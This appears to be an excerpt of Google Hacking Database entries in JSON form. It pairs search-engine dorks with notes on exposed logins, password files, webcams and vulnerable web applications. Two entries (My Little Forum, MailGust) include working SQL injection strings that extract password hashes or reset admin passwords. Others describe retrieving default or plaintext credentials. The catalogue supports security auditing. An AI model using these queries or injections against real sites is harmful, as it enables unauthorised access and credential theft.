a failure in the application to properly sanitize user-supplied input before using it in SQL queries." }, { "signatureReferenceNumber": "1126", "link": "https://www.exploit-db.com/ghdb/1126/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:/modcp/+intext:Moderator%2BvBulletin&hl=en&lr=&c2coff=1&safe=off&start=0&sa=N", "shortDescription": "inurl:/modcp/ intext:Moderator+vBulletin", "textualDescription": "there have been several dorks for vBulletin, but I could not find one in the search that targets the moderators control panel login page - this search targets versions 3.0 onwards." }, { "signatureReferenceNumber": "1127", "link": "https://www.exploit-db.com/ghdb/1127/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22i-secure+v1.1%22+-edu&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:\"i-secure v1.1\" -edu", "textualDescription": "I-Secure Login Pages" }, { "signatureReferenceNumber": "1128", "link": "https://www.exploit-db.com/ghdb/1128/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22Login+to+the+forums+-+%40www.aimoo.com%22+inurl:login.cfm%3Fid%3D&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:\"Login to the forums - @www.aimoo.com\" inurl:login.cfm?id=", "textualDescription": "Aimoo Login Pages. \"Looking for a free message board solution? Aimoo provides one of the most powerful, feature rich, community based forum services available!\"" }, { "signatureReferenceNumber": "1129", "link": "https://www.exploit-db.com/ghdb/1129/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&q=intitle%3A%22Login+Forum+Powered+By+AnyBoard%22+intitle%3A%22If+you+are+a+new+user%22+intext%3A%22Forum+Powered+By+AnyBoard%22+inurl%3Agochat+-edu", "shortDescription": "intitle:\"Login Forum Powered By AnyBoard\" intitle:\"If you are a new user:\" intext:\"Forum Powered By AnyBoard\" inurl:gochat -edu", "textualDescription": "Anyboard Login Portals. In addition,A vulnerability has been reported in Netbula Anyboard 9.x \"that may allow a remote attacker to gain access to sensitive data. This problem is due to an information disclosure issue that can be triggered by an attacker sending specific HTTP requests to a vulnerable host. This will result in sensitive information about the system being revealed to the attacker.\"" }, { "signatureReferenceNumber": "1130", "link": "https://www.exploit-db.com/ghdb/1130/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=%22Mimicboard2+086%22%2B%222000+Nobutaka+Makino%22%2B%22password%22%2B%22message%22+inurl%3Apage%3D1&btnG=Search", "shortDescription": "\"Mimicboard2 086\"+\"2000 Nobutaka Makino\"+\"password\"+\"message\" inurl:page=1", "textualDescription": "Mimicboard2 is prone to multiple HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content." }, { "signatureReferenceNumber": "1131", "link": "https://www.exploit-db.com/ghdb/1131/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&q=%22your+password+is%22+filetype%3Alog", "shortDescription": "\"your password is\" filetype:log", "textualDescription": "This search finds log files containing the phrase (Your password is). These files often contain plaintext passwords, although YMMV." }, { "signatureReferenceNumber": "1132", "link": "https://www.exploit-db.com/ghdb/1132/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=+%22admin+account+info%22+filetype%3Alog", "shortDescription": "\"admin account info\" filetype:log", "textualDescription": "searches for logs containing admin server account information such as username and password." }, { "signatureReferenceNumber": "1133", "link": "https://www.exploit-db.com/ghdb/1133/", "category": "Error Messages", "querystring": "http://www.google.com/search?num=100&hl=en&q=%22Warning%3A+Supplied+argument+is+not+a+valid+File-Handle+resource+in%22+", "shortDescription": "\"Warning: Supplied argument is not a valid File-Handle resource in\"", "textualDescription": "This error message cqan reveal path information. This message (like other error messages) is often posted to help forums, although the message still reveals path info in this form. Consider using the site: operator to narrow search." }, { "signatureReferenceNumber": "1134", "link": "https://www.exploit-db.com/ghdb/1134/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&q=%22Maintained+with+Subscribe+Me+2.044.09p%22%2B%22Professional%22+inurl%3A%22s.pl%22+", "shortDescription": "\"Maintained with Subscribe Me 2.044.09p\"+\"Professional\" inurl:\"s.pl\"", "textualDescription": "subscribe Me Pro 2.0.44.09p is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input. Exploitation of this vulnerability could lead to a loss of confidentiality as arbitrary files are disclosed to an attacker. Information obtained through this attack may aid in further attacks against the underlying system.http://www.securityfocus.com/bid/14817/exploit" }, { "signatureReferenceNumber": "1135", "link": "https://www.exploit-db.com/ghdb/1135/", "category": "Error Messages", "querystring": "http://www.google.com/search?num=100&hl=en&q=%22Warning%3A%22+%22SAFE+MODE+Restriction+in+effect.%22+%22The+script+whose+uid+is%22+%22is+not+allowed+to+access+owned+by+uid+0+in%22+%22on+line%22", "shortDescription": "\"Warning:\" \"SAFE MODE Restriction in effect.\" \"The script whose uid is\" \"is not allowed to access owned by uid 0 in\" \"on line\"", "textualDescription": "This error message reveals full path information. Recommend use of site: operator to narrow searches." }, { "signatureReferenceNumber": "1136", "link": "https://www.exploit-db.com/ghdb/1136/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&q=intitle%3A%22Admin+Login%22+%22admin+login%22+%22blogware%22+-site%3Ablogware.com+-filetype%3Ahtml", "shortDescription": "intitle:\"Admin Login\" \"admin login\" \"blogware\"", "textualDescription": "Blogware Login Portal: \"An exciting and innovative tool for creating or enhancing your web presence. It is your key to easy publishing on the World Wide Web \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u201c share pictures, video, links, documents, newsletters, opinions and more, with family, friends and colleagues. Now you can have a website without being a Webmaster. It\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2s simple! There is no HTML to learn and no new software to download and install.\"" }, { "signatureReferenceNumber": "1137", "link": "https://www.exploit-db.com/ghdb/1137/", "category": "Footholds", "querystring": "http://www.google.com/search?num=100&hl=en&q=intitle%3A%22net2ftp%22+%22powered+by+net2ftp%22+inurl%3Aftp+OR+intext%3Alogin+OR+inurl%3Alogin", "shortDescription": "intitle:\"net2ftp\" \"powered by net2ftp\" inurl:ftp OR intext:login OR inurl:login", "textualDescription": "net2ftp is a web-based FTP client written in PHP. Lets explain this in detail. Web-based means that net2ftp runs on a web server, and that you use a browser (for example Internet Explorer or Mozilla)" }, { "signatureReferenceNumber": "1138", "link": "https://www.exploit-db.com/ghdb/1138/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?num=100&hl=en&q=inurl%3Acartwiz%2Fstore%2Findex.asp", "shortDescription": "inurl:cartwiz/store/index.asp", "textualDescription": "The CartWIZ eCommerce Shopping Cart System will help you build your online store through an interactive web-based e-commerce administration interface.There are, multiple sql injection and xss in cartwiz asp cart.http://neworder.box.sk/explread.php?newsid=13534" }, { "signatureReferenceNumber": "1139", "link": "https://www.exploit-db.com/ghdb/1139/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?num=100&hl=en&q=intitle%3A%22Control+panel%22+%22Control+Panel+Login%22+ArticleLive+inurl%3Aadmin+-demo&filter=0", "shortDescription": "intitle:\"Control panel\" \"Control Panel Login\" ArticleLive inurl:admin -demo", "textualDescription": "Build, manage and customize your own search engine friendly news / article site from scratch -- with absolutely no technical experience.Authentication bypass, sql injections and xss in ArticleLive 2005http://neworder.box.sk/explread.php?newsid=13582" }, { "signatureReferenceNumber": "1140", "link": "https://www.exploit-db.com/ghdb/1140/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&q=%22Powered+by+autolinks+pro+2.1%22+inurl%3Aregister.php", "shortDescription": "\"Powered by autolinks pro 2.1\" inurl:register.php", "textualDescription": "AutoLinksPro is a linking solution. AutoLinksPro link exchange software was built for the search engines to help improve your search engine rankings, traffic, and sales.Remote PHP File Include Vulnerabilityhttp://www.securityfocus.com/archive/1/409529/30/120/threaded" }, { "signatureReferenceNumber": "1141", "link": "https://www.exploit-db.com/ghdb/1141/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&q=%22CosmoShop+by+Zaunz+Publishing%22+inurl%3A%22cgi-bin%2Fcosmoshop%2Flshop.cgi%22+-johnny.ihackstuff.com+-V8.10.106+-V8.10.100+-V.8.10.85+-V8.10.108+-V8.11*", "shortDescription": "\"CosmoShop by Zaunz Publishing\" inurl:\"cgi-bin/cosmoshop/lshop.cgi\" -johnny.ihackstuff.com -V8.10.106 -V8.10.100 -V.8.10.85 -V8.10.108 -V8.11*", "textualDescription": "cosmoshop is a comercial shop system written as a CGI.vulnerabilities:sql injection, passwords saved in cleartext, view any filehttp://www.securityfocus.com/archive/1/409510/30/120/threaded" }, { "signatureReferenceNumber": "1142", "link": "https://www.exploit-db.com/ghdb/1142/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&q=%22Powered+by+Woltlab+Burning+Board%22+-%222.3.3%22+-%22v2.3.3%22+-%22v2.3.2%22+-%222.3.2%22", "shortDescription": "\"Powered by Woltlab Burning Board\" -\"2.3.3\" -\"v2.3.3\" -\"v2.3.2\" -\"2.3.2\"", "textualDescription": "It's an exact replica of vbulletin but it is free.SQL-Injection Exploit:http://www.governmentsecurity.org/archive/t14850.html" }, { "signatureReferenceNumber": "1143", "link": "https://www.exploit-db.com/ghdb/1143/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&q=%22Please+login+with+admin+pass%22+-%22leak%22+-sourceforge", "shortDescription": "\"Please login with admin pass\" -\"leak\" -sourceforge", "textualDescription": "PHPsFTPd is a web based administration and configuration interface for the SLimFTPd ftp serverIt can be used an any http server that suports PHP and does not need a database or adittional php modules, only SlimFTPD It allows the administrators of the ftp server to configurate it from within this interface as opposed to its native ascii conf.file It shows statistics about the users that accesed the server , the files that were downloaded , server breakdowns etcAdmin password leak:http://cert.uni-stuttgart.de/archive/bugtraq/2005/07/msg00209.html" }, { "signatureReferenceNumber": "1144", "link": "https://www.exploit-db.com/ghdb/1144/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&q=intitle%3A%22PHP+TopSites+FREE+Remote+Admin%22", "shortDescription": "intitle:\"PHP TopSites FREE Remote Admin\"", "textualDescription": "PHP TopSites is a PHP/MySQL-based customizable TopList script. Main features include: Easy configuration config file; MySQL database backend; unlimited categories, Site rating on incoming votes; Special Rating from Webmaster; anti-cheating gateway; Random link; Lost password function; Webmaster Site-approval; Edit site; ProcessingTime display; Cookies Anti-Cheating; Site Reviews; Linux Cron Free; Frame Protection and much more.PHP TopSites Discloses Configuration Data to Remote Users:http://www.securitytracker.com/alerts/2005/Jul/1014552.htmlPS: all versions are vulnerable at time of writing." }, { "signatureReferenceNumber": "1145", "link": "https://www.exploit-db.com/ghdb/1145/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&q=intitle%3A%22iDevAffiliate+-+admin%22+-demo", "shortDescription": "intitle:\"iDevAffiliate - admin\" -demo", "textualDescription": "Affiliate Tracking Software \tAdding affiliate tracking software to your site is one of the most effective ways to achieve more sales and more traffic! Our affiliate software installs in just minutes and integrates easily intoyour existing website." }, { "signatureReferenceNumber": "1146", "link": "https://www.exploit-db.com/ghdb/1146/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?hl=it&q=%22powered+by+my+little+forum%22&btnG=Cerca&meta=", "shortDescription": "\"powered by my little forum\"", "textualDescription": "My Little Forum 1.5 / 1.6beta SQL Injectionsoftware:site: http://www.mylittlehomepage.net/my_little_forumsoftware: \"A simple web-forum that supports classical thread view (message tree)as well as messagebord view to display the messages.Requires PHP > 4.1 and a MySQL database.\"1) look at the vulnerable code at line 144 inside search.php:... $result = mysql_query(\"SELECT id, pid, tid, DATE_FORMAT(time + INTERVAL \". $time_difference.\" HOUR,'\".$lang['time_format'].\"') AS Uhrzeit, DATE_FORMAT(time + INTERVAL \".$time_difference.\" HOUR, '\".$lang['time_format'].\"') AS Datum, subject, name, email, hp, place, text, category FROM \".$forum_table.\" WHERE \".$search_string.\" ORDER BY tid DESC, time ASC LIMIT \".$ul.\", \" .$settings['search_results_per_page'], $connid);...now goto the search page, select \"phrase\", and type:[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata whereuser_name='[username]' /*if magic quotes are off you will have (guess?...) any admin/user password hash'cause $searchstring var is not filtered...u can fin my poc exploit here:http://rgod.altervista.org/mylittle15_16b.html2) 1.6beta is vulnerable even, we have:...$result = mysql_query(\"SELECT id, pid, tid, UNIX_TIMESTAMP(time + INTERVAL \".$time_difference.\" HOUR) ASUhrzeit, subject, name, email, hp, place, text, category FROM \".$db_settings['forum_table'].\"WHERE \".$search_string.\" ORDER BY tid DESC, time ASC LIMIT \".$ul.\", \".$settings['search_results_per_page'],$connid);...you have same results, deleting a statement in injection string:[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata whereuser_name='[username]' /*" }, { "signatureReferenceNumber": "1147", "link": "https://www.exploit-db.com/ghdb/1147/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?hl=it&q=%22powered+by+mailgust%22&btnG=Cerca+con+Google&meta=", "shortDescription": "\"powered by mailgust\"", "textualDescription": "MailGust 1.9/2.0 (possibly prior versions) SQL injection / board takevorsoftware:site: http://www.mailgust.org/description:Mailgust is three softwares in one: * Mailing list manager * Newsletter distribution tool * Message Board Mailgust is written in php and uses a mysql database. vulnerability:if magic quotes off -> SQL Injectionwithout to have an account, a user can send himself a new admin password usingpassword reminder, in email field type:[yuor_email],'or'a'='a'/*@hotmail.comgive a look to what happen:220 [MAILSERVER] SMTP Service readyHELO [MAILGUST]250 [MAILSERVER].MAIL FROM:250 MAIL FROM: OKRCPT TO:250 RCPT TO:>[your_email] OKRCPT TO: OKDATA354 Start mail input; end with .Date: Sat, 24 Sep 2005 16:11:38 +0100Subject: New passwordTo: [your_email],'or'a'='a'/*@hotmail.comFrom: systemxxx@localhost.comYour login name is: [admin_email]Your new password is: 4993587Click here:http://localhost/mailgust/index.php?method=activate_new_password&list=maillistuser&pwd=4993587&id=1756185114to activate the password, than try to log in!It is recommended that you change your password afterwards..250 Mail acceptedQUIT221 [MAILSERVER] QUITvulnerable query is in [path_to_mailgust]/gorum/user_email.php at line 363:...$query = \"SELECT * FROM $applName\".\"_$userClassName \". \"WHERE email='$this->email'\";...it becomes:SELECT * FROM maillist_maillistuser WHERE email='[yuor_email],'or'a'='a'/*@hotmail.com'\"or'a'='a'\" is always true, so the query is always true, script doesn't fail, for mail function, theese are two valid email address,it will send the mail to [your_email] and to 'or'a'='a'/*@hotmail.com ;)activate the password, now you can login with [admin_email] as user and new passwordu can find my poc exploit here:http://rgod.altervista.org/maildisgust.html" }, { "signatureReferenceNumber": "1148", "link": "https://www.exploit-db.com/ghdb/1148/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle%3A%22Folder+Listing%22+%22Folder+Listing%22+Name+Size+Date%2FTime+File+Folder", "shortDescription": "intitle:\"Folder Listing\" \"Folder Listing\" Name Size Date/Time File Folder", "textualDescription": "directory listing for Fastream NETFile Web Server" }, { "signatureReferenceNumber": "1149", "link": "https://www.exploit-db.com/ghdb/1149/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=%22Directory+Listing+for%22+%22Hosted+by+Xerver%22", "shortDescription": "\"Directory Listing for\" \"Hosted by Xerver\"", "textualDescription": "directory listing for Xerver web server" }, { "signatureReferenceNumber": "1150", "link": "https://www.exploit-db.com/ghdb/1150/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle%3A%22Supero+Doctor+III%22+-inurl%3Asupermicro", "shortDescription": "intitle:\"Supero Doctor III\" -inurl:supermicro", "textualDescription": "\"Supero Doctor III Remote Management\" by Supermicro, Inc.info: http://www.supermicro.es/products/accessories/software/SuperODoctorIII.htmljust look for default password..." }, { "signatureReferenceNumber": "1151", "link": "https://www.exploit-db.com/ghdb/1151/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22Netcam%22+intitle:%22user+login%22&hl=en&lr=&c2coff=1&filter=0", "shortDescription": "intitle:\"Netcam\" intitle:\"user login\"", "textualDescription": "just yet other online cam." }, { "signatureReferenceNumber": "1152", "link": "https://www.exploit-db.com/ghdb/1152/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+PHP-Fusion+v6.00.109+%C2%A9+2003-2005.+-php-fusion.co.uk", "shortDescription": "Powered by PHP-Fusion v6.00.109 \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 2003-2005. -php-fusion.co.uk", "textualDescription": "this is the dork: Powered by PHP-Fusion v6.00.109 \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 2003-2005. -php-fusion.co.ukas it is, without quotes, for the version I tested, prone toSQL Injection / administrative credentials disclosurethis my advisory/poc exploit: http://rgod.altervista.org/phpfusion600109.html" }, { "signatureReferenceNumber": "1153", "link": "https://www.exploit-db.com/ghdb/1153/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&q=inurl%3A%2Fyabb%2FMembers%2FAdmin.dat", "shortDescription": "inurl:/yabb/Members/Admin.dat", "textualDescription": "This search will show you the Administrator password (very first line) on YaBB forums whose owners didnt configure the permissions correctly. Go up a directory to get a full memberlist (the .dat files have the passwords)." }, { "signatureReferenceNumber": "1154", "link": "https://www.exploit-db.com/ghdb/1154/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22Biromsoft+WebCam%22+-4.0+-serial+-ask+-crack+-software+-a+-the+-build+-download+-v4+-3.01+-numrange:1-10000&num=100&hl=en&lr=&c2coff=1&filter=0", "shortDescription": "intitle:\"Biromsoft WebCam\" -4.0 -serial -ask -crack -software -a -the -build -download -v4 -3.01 -numrange:1-10000", "textualDescription": "Brimsoft webcam software enables anyone with a webcam to easily create a webcam http server. This googledork looks for these webcam servers." }, { "signatureReferenceNumber": "1155", "link": "https://www.exploit-db.com/ghdb/1155/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=%28intitle%3A%22VisionGS+Webcam+Software%22%29%7C%28intext%3A%22Powered+by+VisionGS+Webcam%22%29+-showthread.php+-showpost.php+-%22Search+Engine%22+-computersglobal.com+-site%3Agolb.org+-site%3Achat.ru+-site%3Afindlas", "shortDescription": "(intitle:\"VisionGS Webcam Software\")|(intext:\"Powered by VisionGS Webcam\") -showthread.php -showpost.php -\"Search Engine\" -computersglobal.com -site:g", "textualDescription": "I don't know if the google query got submitted right because it looks truncated. here it is again:(intitle:\"VisionGS Webcam Software\")|(intext:\"Powered by VisionGS Webcam\") -showthread.php -showpost.php -\"Search Engine\" -computersglobal.com -site:golb.org -site:chat.ru -site:findlastminute.de -site:tricus.de -site:urlaubus.de -johnny.ihackstuff VisionGS webcam software enables anyone with a webcam to easily host a webcam http server. This dork finds those servers." }, { "signatureReferenceNumber": "1156", "link": "https://www.exploit-db.com/ghdb/1156/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+By%3A+lucidCMS+1.0.11%22", "shortDescription": "\"Powered By: lucidCMS 1.0.11\"", "textualDescription": "Lucid CMS 1.0.11 SQL Injection /Login bypassthis is the dork for ther version I tested:\"Powered By: lucidCMS 1.0.11\"advisory/poc exploit:http://rgod.altervista.org/lucidcms1011.htmlwe have an XSS even:http://packetstorm.linuxsecurity.com/0509-exploits/lucidCMS.txt" }, { "signatureReferenceNumber": "1157", "link": "https://www.exploit-db.com/ghdb/1157/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22News+generated+by+Utopia+News+Pro%22+%7C+%22Powered+By%3A+Utopia+News+Pro%22", "shortDescription": "\"News generated by Utopia News Pro\" | \"Powered By: Utopia News Pro\"", "textualDescription": "Utopia News Pro 1.1.3 (and prior versions) SQL Injection & XSSadvisory & poc exploit:http://rgod.altervista.org/utopia113.html" }, { "signatureReferenceNumber": "1158", "link": "https://www.exploit-db.com/ghdb/1158/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=inurl:login.jsp.bak", "shortDescription": "inurl:login.jsp.bak", "textualDescription": "JSP programmer anyone? You can read this!" }, { "signatureReferenceNumber": "1159", "link": "https://www.exploit-db.com/ghdb/1159/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle%3AMantis+%22Welcome+to+the+bugtracker%22+%220.15+%7C+0.16+%7C+0.17+%7C+0.18%22", "shortDescription": "intitle:Mantis \"Welcome to the bugtracker\" \"0.15 | 0.16 | 0.17 | 0.18\"", "textualDescription": "cross site scripting and sql injection vunerabilities were discovered in Mantis versions 0.19.2 or less. Mantis is a web-based bugtracking system written in PHP. Vunerability report athttp://search.securityfocus.com/archive/1/411591/30/0/threaded" }, { "signatureReferenceNumber": "1160", "link": "https://www.exploit-db.com/ghdb/1160/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22IQeye302+%7C+IQeye303+%7C+IQeye601+%7C+IQeye602+%7C+IQeye603%22+intitle:%22Live+Images%22&num=100&hl=en&lr=&c2coff=1&filter=0", "shortDescription": "intitle:\"IQeye302 | IQeye303 | IQeye601 | IQeye602 | IQeye603\" intitle:\"Live Images\"", "textualDescription": "This is a googledork for IQeye netcams. Some of which you can control how they tilt/zoom. The default admin username/password are root/system." }, { "signatureReferenceNumber": "1161", "link": "https://www.exploit-db.com/ghdb/1161/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intitle%3A%22urchin+%285%7C3%7Cadmin%29%22+ext%3Acgi", "shortDescription": "intitle:\"urchin (5|3|admin)\" ext:cgi", "textualDescription": "Gain access to Urchin analysis reports." }, { "signatureReferenceNumber": "1162", "link": "https://www.exploit-db.com/ghdb/1162/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?num=30&q=inurl%3Astatus.cgi%3Fhost%3Dall+-cvs", "shortDescription": "inurl:status.cgi?host=all", "textualDescription": "Nagios Status page. See what ports are being monitored as well as ip addresses.Be sure to check the google cached page first." }, { "signatureReferenceNumber": "1163", "link": "https://www.exploit-db.com/ghdb/1163/", "category": "Footholds", "querystring": "http://www.google.com/search?complete=1&hl=en&q=inurl%3Apolly%2FCP", "shortDescription": "inurl:polly/CP", "textualDescription": "You can get into admin panel without logging." }, { "signatureReferenceNumber": "1164", "link": "https://www.exploit-db.com/ghdb/1164/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22Cyphor+%28Release%3A%22+-www.cynox.ch", "shortDescription": "\"Cyphor (Release:\" -www.cynox.ch", "textualDescription": "Cyphor 0.19 (possibly prior versions) SQL Injection / Board takeover / cross site scriptingmy advisory & poc exploit:http://rgod.altervista.org/cyphor019.htmlrgodModerator PS: The software is longer maintained." }, { "signatureReferenceNumber": "1165", "link": "https://www.exploit-db.com/ghdb/1165/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22Welcome+to+the+versatileBulletinBoard%22+%7C+%22Powered+by+versatileBulletinBoard%22", "shortDescription": "\"Welcome to the versatileBulletinBoard\" | \"Powered by versatileBulletinBoard\"", "textualDescription": "versatileBulletinBoard V1.0.0 RC2 (possibly prior versions)multiple SQL Injection vulnerabilities / login bypass / cross site scripting / information disclosureadvisory:http://rgod.altervista.org/versatile100RC2.html" }, { "signatureReferenceNumber": "1166", "link": "https://www.exploit-db.com/ghdb/1166/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=inurl%3Aocw_login_username", "shortDescription": "inurl:ocw_login_username", "textualDescription": "WEBppliance is a software application designed to automate the deployment and management of Web-hosting services. There is a bug in how this product does the Logon validation. This Search will take you directly into the Admin pages....U can delete an User....(Plz dont do that..)Enjoy,Night Hacker" }, { "signatureReferenceNumber": "1167", "link": "https://www.exploit-db.com/ghdb/1167/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intitle%3ABookmarks+inurl%3Abookmarks.html+%22Bookmarks+Toolbar+Folder%22+%22Add+bookmarks+to+this+folder+to+see+them+displayed+on+the+Bookmarks+Toolbar%22", "shortDescription": "intitle:Bookmarks inurl:bookmarks.html \"Bookmarks", "textualDescription": "AFAIK are the bookmarks of Firefox, Netscape and Mozilla stored in bookmarks.html. It is often uploaded to serve as a backup, so it could reveal some juicy information." }, { "signatureReferenceNumber": "1168", "link": "https://www.exploit-db.com/ghdb/1168/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&q=%22The+following+report+contains+confidential+information%22+vulnerability+-search", "shortDescription": "\"The following report contains confidential information\" vulnerability -search", "textualDescription": "This googledork reveals vunerability reports from many different vendors. These reports can contain information which can help an attacker break into a system/network." }, { "signatureReferenceNumber": "1169", "link": "https://www.exploit-db.com/ghdb/1169/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=%22Shadow+Security+Scanner+performed+a+vulnerability+assessment%22&num=100&hl=en&lr=&filter=1", "shortDescription": "\"Shadow Security Scanner performed a vulnerability assessment\"", "textualDescription": "This is a googledork to find vulnerability reports produced by Shadow Security Scanner. They contain valuable information which can be used to break into a system." }, { "signatureReferenceNumber": "1170", "link": "https://www.exploit-db.com/ghdb/1170/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22Docutek+ERes+-+Admin+Login%22+-edu&num=100&hl=en&lr=&c2coff=1&filter=0", "shortDescription": "intitle:\"Docutek ERes - Admin Login\" -edu", "textualDescription": "Docutek Eres is software that helps libaries get an internet end to them. This dork finds the admin login in page. Using Docutek Eres you can look through course material amoung other things." }, { "signatureReferenceNumber": "1171", "link": "https://www.exploit-db.com/ghdb/1171/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=intitle:%22Retina+Report%22+%22CONFIDENTIAL+INFORMATION%22&num=100&hl=en&lr=&c2coff=1&filter=0", "shortDescription": "intitle:\"Retina Report\" \"CONFIDENTIAL INFORMATION\"", "textualDescription": "This googledork finds vulnerability reports produced by eEye Retina Security Scanner. The information inside these reports can help an attacker break into a system/network." }, { "signatureReferenceNumber": "1172", "link": "https://www.exploit-db.com/ghdb/1172/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=intitle%3A%22CJ+Link+Out+V1%22&btnG=Search", "shortDescription": "intitle:\"CJ Link Out V1\"", "textualDescription": "A cross site scripting vunerability has been discovered in CJ linkout version 1.x. CJ linkout is a free product which allows you to easily let users connect to a different site with a frame at the top which links back to your site. The vulnerability report can be found at http://secunia.com/advisories/16970/ ." }, { "signatureReferenceNumber": "1173", "link": "https://www.exploit-db.com/ghdb/1173/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?as_q=server-dbs&num=100&hl=en&c2coff=1&btnG=Google+Search&as_epq=intitle%3Aindex+of&as_oq=&as_eq=&lr=&as_ft=i&as_filetype=&as_qdr=all&as_occt=any&as_dt=i&as_sitesearch=&safe=images", "shortDescription": "server-dbs \"intitle:index of\"", "textualDescription": "Yes, people actually post their teamspeak servers on websites. Just look for the words superadmin in the files and the password trails it in plain text." }, { "signatureReferenceNumber": "1174", "link": "https://www.exploit-db.com/ghdb/1174/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&q=inurl%3A%22Sites.dat%22%2B%22PASS%3D%22&btnG=Google+Search", "shortDescription": "inurl:\"Sites.dat\"+\"PASS=\"", "textualDescription": "FlashFXP has the ability to import a Sites.dat file into its current Sites.dat file, using this search query you are able to find websites misconfigured to share the flashfxp folder and subsequently the Sites.dat file containing all custom sites the victim has in their sitelist. the passwords are not clear text but if you import the sites.dat into flashfxp you can connect to the ftps and it automatically sends the password. you can also set flashfxp to not hide passwords and it will show you what the password is when it connects." }, { "signatureReferenceNumber": "1175", "link": "https://www.exploit-db.com/ghdb/1175/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=(%22port_255/home%22)%7C(inurl:%22home%3Fport%3D255%22)&num=100&hl=en&lr=&safe=off&filter=0", "shortDescription": "(\"port_255/home\")|(inurl:\"home?port=255\")", "textualDescription": "standered printer search. Moderator note: see also dork id=1221" }, { "signatureReferenceNumber": "1176", "link": "https://www.exploit-db.com/ghdb/1176/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&q=%22This+page+is+for+configuring+Samsung+Network+Printer%22+%7C+printerDetails.htm", "shortDescription": "\"This page is for configuring Samsung Network Printer\" | printerDetails.htm", "textualDescription": "several different samsung printers" }, { "signatureReferenceNumber": "1177", "link": "https://www.exploit-db.com/ghdb/1177/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&newwindow=1&safe=off&c2coff=1&q=log+inurl%3Alinklint+filetype%3Atxt+-%22checking%22&btnG=Search", "shortDescription": "log inurl:linklint filetype:txt -\"checking\"", "textualDescription": "Linklint is an Open Source Perl program that checks links on web sites. This search finds the Linklint log directory. Complete site map able to be recreated, and if you go back one directory you can see all the other files generated by linklint. Thanks to CP for direction." }, { "signatureReferenceNumber": "1178", "link": "https://www.exploit-db.com/ghdb/1178/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=inurl%3Acourse%2Fcategory.php+%7C+inurl%3Acourse%2Finfo.php+%7C+inurl%3Aiplookup%2Fipatlas%2Fplot.php", "shortDescription": 